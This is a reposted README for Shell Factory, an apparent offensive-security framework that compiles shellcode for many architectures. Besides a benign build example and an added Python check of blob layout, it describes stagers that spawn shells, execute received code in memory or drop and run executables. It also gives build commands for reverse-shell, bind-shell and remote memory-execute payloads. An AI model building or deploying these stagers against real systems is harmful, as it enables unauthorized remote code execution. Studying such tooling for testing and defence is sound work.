Shellcode Builder: Shell Factory

Shell Factory is a framework for compiling shellcodes from a C++ source for multiple systems and architectures.

It is composed of multiple parts:

  • a Rakefile for compiling and linking with different compilers and for different architectures.
  • the factory, a set of C++ headers that generate system calls for different systems and architectures.
  • picolib, a generic C++ library built on the system call factory that abstracts interactions with the target system.

The shellcode is compiled as a single compilation unit with common optimizations to reduce its code size.

The resulting file is intended to be a single binary blob that can be executed from anywhere in memory, with execution starting at offset 0.

Basic usage

Put your shellcode source file in the shellcodes directory, then compile it with rake <shellcode>.

For example, create a template file named shellcodes/ :

#include <factory.h>
#include <pico.h>

using namespace Pico;


Then compile it with: rake template. On a Linux amd64 system, this will generate the files bins/template.elf and bins/template.x86_64-linux.bin.

$ objdump -d bins/template.elf

00000000004000b0 <_start>:
  4000b0:       31 ff                   xor    %edi,%edi
  4000b2:       b8 e7 00 00 00          mov    $0xe7,%eax
  4000b7:       0f 05                   syscall
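As an added check (not part of Shell Factory), the Python script below verifies the property the two build artefacts are meant to have: the raw .bin blob must be byte-identical to the ELF's code starting at _start, so that offset 0 of the blob really is the entry point. It assumes the .bin is a straight copy of the executable segment from the entry onward, and it builds a minimal ELF inline from the nine bytes objdump showed above so that it runs offline; on a real build, pass the contents of bins/template.elf and bins/template.x86_64-linux.bin instead.

```python
import struct

# Constructed sample: the bytes objdump showed for the empty template
# (xor %edi,%edi ; mov $0xe7,%eax ; syscall), i.e. exit_group(0) on amd64.
SAMPLE_CODE = bytes.fromhex("31ffb8e70000000f05")


def build_min_elf64(code: bytes, base: int = 0x400000) -> bytes:
    """Build a minimal static x86-64 ELF (constructed here so the check can
    run offline; a real input is the bins/<name>.elf that rake produces)."""
    ehdr_size, phdr_size = 64, 56
    code_off = ehdr_size + phdr_size        # code sits right after the headers
    entry = base + code_off                 # e_entry points at the first code byte
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7  # ELF64, LE
    ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, entry, ehdr_size,
                                 0, 0, ehdr_size, phdr_size, 1, 0, 0, 0)
    size = code_off + len(code)
    # One PT_LOAD segment, flags R+X, mapping the whole file at `base`.
    phdr = struct.pack("<IIQQQQQQ", 1, 5, 0, base, base, size, size, 0x1000)
    return ehdr + phdr + code


def entry_code(elf: bytes) -> bytes:
    """Return the bytes from e_entry to the end of the executable PT_LOAD
    segment containing it: what the raw .bin blob should consist of."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF")
    e_entry, e_phoff = struct.unpack_from("<QQ", elf, 24)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    for i in range(e_phnum):
        p_type, p_flags, p_offset, p_vaddr, _, p_filesz = struct.unpack_from(
            "<IIQQQQ", elf, e_phoff + i * e_phentsize)
        if p_type == 1 and p_flags & 1 and p_vaddr <= e_entry < p_vaddr + p_filesz:
            start = p_offset + (e_entry - p_vaddr)
            return elf[start:p_offset + p_filesz]
    raise ValueError("entry point is not inside an executable PT_LOAD segment")


def blob_starts_at_entry(blob: bytes, elf: bytes) -> bool:
    """True when the blob equals the ELF's code from _start onward, i.e. the
    blob can be jumped into at offset 0 exactly as the ELF would be entered."""
    return blob == entry_code(elf)


if __name__ == "__main__":
    elf = build_min_elf64(SAMPLE_CODE)
    print(blob_starts_at_entry(SAMPLE_CODE, elf))            # True
    print(blob_starts_at_entry(b"\x90" + SAMPLE_CODE, elf))  # False: entry no longer at offset 0
```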


Default shellcodes

Three generic stager shellcodes are provided in the shellcodes directory:

  • shellexec : runs a standard /bin/sh shell or any specified command.
  • memexec : allocates executable memory, receives data and executes it.
  • dropexec : reads data, drops an executable file on the system and executes it.

Channels

Channels are an abstraction layer that lets a shellcode use different kinds of data streams, selected through compilation variables: files, sockets, or already opened file descriptors.

They are typically used by shellexec, memexec and dropexec to receive and send data. When no channel is specified, standard input/output is used by default.



Reverse shell on the local network
rake shellexec CHANNEL=TCP_CONNECT HOST= PORT=2222


Bind-shell TCPv6
rake shellexec CHANNEL=TCP6_LISTEN HOST=::1 PORT=1111


Reverse memory execute over SCTPv6
rake memexec CHANNEL=SCTP6_CONNECT HOST=fe80::800:27ff:fe00:0 PORT=3333


Supported targets

Architectures: x86, amd64, ARM, AArch64, PowerPC, SH4, MIPS

Items marked as ∼ are a work in progress and are not fully implemented yet.


Source: CyberPunk @ February 27, 2017 at 10:37AM